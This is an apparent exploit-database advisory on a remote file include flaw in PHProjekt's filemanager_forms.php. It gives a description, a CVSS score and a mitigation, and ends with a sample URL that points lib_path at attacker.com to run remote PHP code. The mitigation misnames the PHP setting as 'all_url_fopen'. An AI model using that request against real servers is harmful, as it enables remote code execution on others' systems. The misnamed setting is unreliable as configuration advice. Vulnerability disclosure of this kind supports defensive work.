PHProjekt Remote File Include Vulnerability

vendor:

PHProjekt

by:

PHProjekt Development Team

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: PHProjekt

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux, Unix, Windows

2002

PHProjekt Remote File Include Vulnerability

PHProjekt is prone to an issue which may allow an attacker to include arbitrary files located on a remote server. If the included file is a PHP script, this may allow for execution of arbitrary attacker-supplied code. Successful exploitation depends partly on the configuration of PHP on the host running the vulnerable software. If 'all_url_fopen' is set to 'off' then exploitation of this issue may be limited.

Mitigation:

Set 'all_url_fopen' to 'off'

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/4284/info

PHProjekt is a freely available, open source PHP Groupware package. It is actively maintained by the PHProjekt Development Team. It will run on most Linux and Unix variants, in addition to Microsoft Windows operating systems.

PHProjekt is prone to an issue which may allow an attacker to include arbitrary files located on a remote server. If the included file is a PHP script, this may allow for execution of arbitrary attacker-supplied code.

Successful exploitation depends partly on the configuration of PHP on the host running the vulnerable software. If 'all_url_fopen' is set to 'off' then exploitation of this issue may be limited. 

http://site.com/filemanager/filemanager_forms.php?lib_path=http://attacker.com/nasty/scripts